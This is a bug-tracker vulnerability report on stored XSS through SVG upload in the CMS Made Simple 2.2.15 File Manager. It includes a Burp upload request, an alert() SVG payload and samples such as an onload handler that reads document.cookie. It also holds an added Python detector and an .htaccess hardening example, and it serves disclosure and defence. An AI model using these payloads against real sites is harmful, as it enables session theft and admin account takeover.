CMS MADE SIMPLE FORGE

CMS Made Simple Core


[#12393] XSS via SVG file upload

Created By: Eshan Singh (r0x4r)
Date Submitted: Fri Dec 04 04:48:54 -0500 2020

Assigned To:
Version: 2.2.15
CMSMS Version: 2.2.15
Severity: Major
Resolution: Won't Fix
State: Open
Summary:
XSS via SVG file upload
Detailed Description:
Affected software: CMS Made Simple version 2.2.15 (cmsms)

I want to report a critical XSS which I found in CMSMS.

Description: SVG files can contain JavaScript in <script> tags.
Browsers are smart enough to ignore scripts embedded in SVG files
included via IMG tags. However, a direct request for an SVG file will
result in the scripts being executed.

So an embedded SVG as an attachment in an issue or avatar does not
execute the code, but if a user clicks on the attachment the code will
execute.

Steps to reproduce

+ Log in to the CMSMS admin panel as the admin user.
+ Then go to Content > File Manager > Images and upload the malicious SVG file
(https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg).
+ Now open the SVG file's location
(http://127.0.0.1/cmsms/uploads//images/SVG_XSS.svg) and BOOM! You get the
popup.

Burp Request

POST /cmsms/admin/moduleinterface.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------379224531139948695983200896304
Content-Length: 1040
Origin: http://127.0.0.1
Connection: close
Cookie: a3c9a2f9998cdfdc410fef5f094579cb8f2f3306=c36ffe152373337eee92ec4985172db8528361bf%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoicjB4NHIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkbElVM2FsR2l6UkR0dG5ROHJPVVwvd3V3M3hXano1M0wzYW9pVUhxT2pWQW4xaHNPNjZDLm9HIn0%3D; __c=3d8ee0fbb464e874e82; CMSSESSID5d26ee9cb371=b1gen2isn6vf4g1sal7jdt5upv

-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="mact"

FileManager,m1_,upload,0
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="__c"

3d8ee0fbb464e874e82
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="disable_buffer"

1
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="m1_files[]"; filename="evilsvgfile.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert('This app is probably vulnerable to XSS attacks!');
   </script>
</svg>
-----------------------------379224531139948695983200896304--


Impact: An adversary can carry out an XSS attack and can also take the admin's
cookie and log in through the admin account.
Also, an adversary can manage to log in through any other user's account with
valid session cookies.

Thanks and regards,
Eshan Singh
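The following is an added example, not code from the report or from the CMSMS project: the server-side check an upload handler could run before accepting an image/svg+xml file. It goes a little beyond the report's single case, because a check that only greps for "<script" misses SVGs that execute through other routes; this one parses the file as XML and flags every construct a browser runs when the SVG is opened as a top-level document: <script> and <foreignObject> elements, on* event-handler attributes, and javascript: or data: URLs in href/xlink:href. The function and constant names are this example's own, the first sample is the payload from the Burp request above, and the other three samples are constructed.

```python
"""Reject SVG uploads that carry active content (added example, not CMSMS code).

A browser ignores script when an SVG is referenced from <img>, but runs it when
the file is opened directly. This check walks the XML tree and reports
everything that executes in a top-level SVG document. Function and constant
names are this example's own choices, not CMSMS API.
"""
import re
import xml.etree.ElementTree as ET

DANGEROUS_ELEMENTS = {"script", "foreignObject"}
_JS_URL = re.compile(r"^\s*javascript:", re.IGNORECASE)
_DATA_URL = re.compile(r"^\s*data:", re.IGNORECASE)


def _local(qname):
    """Strip an ElementTree '{namespace}' prefix: '{...svg}script' -> 'script'."""
    return qname.rsplit("}", 1)[-1]


def find_active_content(svg_bytes):
    """Return a list of findings for one SVG document; an empty list is clean.

    Raises ValueError when the bytes are not well-formed XML: a browser would
    still try to render such a file and we do not want to reason about its
    error recovery, so the caller should treat that as a rejection too.
    """
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        raise ValueError(f"not well-formed XML: {exc}") from exc

    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")

    for elem in root.iter():          # root.iter() includes the root itself
        name = _local(elem.tag)
        if name in DANGEROUS_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            aname = _local(attr)      # covers both href and xlink:href
            if aname.lower().startswith("on"):
                findings.append(f"event handler {aname}= on <{name}>")
            elif aname == "href":
                if _JS_URL.match(value):
                    findings.append(f"javascript: URL in href on <{name}>")
                elif _DATA_URL.match(value):
                    findings.append(f"data: URL in href on <{name}>")
    return findings


def is_safe_svg(svg_bytes):
    """Upload-handler verdict: True only for well-formed SVG with no findings."""
    try:
        return not find_active_content(svg_bytes)
    except ValueError:
        return False


# Sample 1: the payload from the report's Burp request.
REPORTED_PAYLOAD = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('This app is probably vulnerable to XSS attacks!');
   </script>
</svg>"""

# Sample 2 (constructed): no <script> element at all, but fires on load,
# so a check that only greps for "<script" would let it through.
HANDLER_PAYLOAD = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>'

# Sample 3 (constructed): script hidden in an xlink:href.
JS_HREF_PAYLOAD = (b'<svg xmlns="http://www.w3.org/2000/svg" '
                   b'xmlns:xlink="http://www.w3.org/1999/xlink">'
                   b'<a xlink:href="javascript:alert(1)"><text y="12">click</text></a></svg>')

# Sample 4 (constructed): a benign icon that must be accepted.
BENIGN_ICON = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
               b'<circle cx="5" cy="5" r="4" fill="#009900"/></svg>')

if __name__ == "__main__":
    for label, doc in [("reported", REPORTED_PAYLOAD), ("onload", HANDLER_PAYLOAD),
                       ("xlink", JS_HREF_PAYLOAD), ("benign", BENIGN_ICON)]:
        print(f"{label:9s} safe={is_safe_svg(doc)} findings={find_active_content(doc)}")
```

The check is deliberately a reject list rather than a sanitiser: rewriting an attacker-controlled SVG and serving the result is harder to get right than refusing it, and for an image-upload feature a refusal costs nothing.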



History

Comments
Date: 2020-12-04 10:36
Posted By: Matt Hornsby (DIGI3)

The admin section is for trusted users only. If you need a login system for
untrusted users, there are third-party modules available. If you feel you need
to protect against certain file types, this is best done using .htaccess or
other server-level security methods.

Please read
https://www.cmsmadesimple.org/community/get-involved/report-a-vulnerability for
more clarification on our position.
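As an added example of the server-level mitigation the comment above points to (this is not a file shipped by CMSMS, and the uploads/ directory and the mod_headers/Apache 2.4 requirements are assumptions), an .htaccess placed in the uploads directory can stop an uploaded SVG from ever running as a document while leaving it usable from <img> tags:

```apache
# Added example for uploads/.htaccess (not part of CMSMS). Assumes Apache 2.4
# with mod_headers enabled and AllowOverride permitting FileInfo and Limit.

<IfModule mod_headers.c>
    <FilesMatch "(?i)\.svgz?$">
        # A navigation to the file downloads it instead of rendering it;
        # <img src="...svg"> in site pages is unaffected.
        Header set Content-Disposition "attachment"
        # Do not let the browser guess a different type.
        Header set X-Content-Type-Options "nosniff"
        # If it is rendered anyway, sandbox it: no script, unique origin,
        # so it cannot read the admin session cookie.
        Header set Content-Security-Policy "default-src 'none'; style-src 'unsafe-inline'; sandbox"
    </FilesMatch>
</IfModule>

# Nothing in the uploads tree should execute server-side, whatever it is named.
<FilesMatch "(?i)\.(php|phtml|phar)$">
    Require all denied
</FilesMatch>
```

The Content-Disposition header is the part that addresses this report directly: the "direct request for a SVG file" becomes a download. The CSP sandbox is the fallback for clients that ignore the disposition, and the PHP deny rule closes the neighbouring problem of a file manager writing into a web-served directory.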
Updates

Updated: 2020-12-04 10:37
resolution_id: 10 => 8

Updated: 2020-12-04 05:06
resolution_id: => 10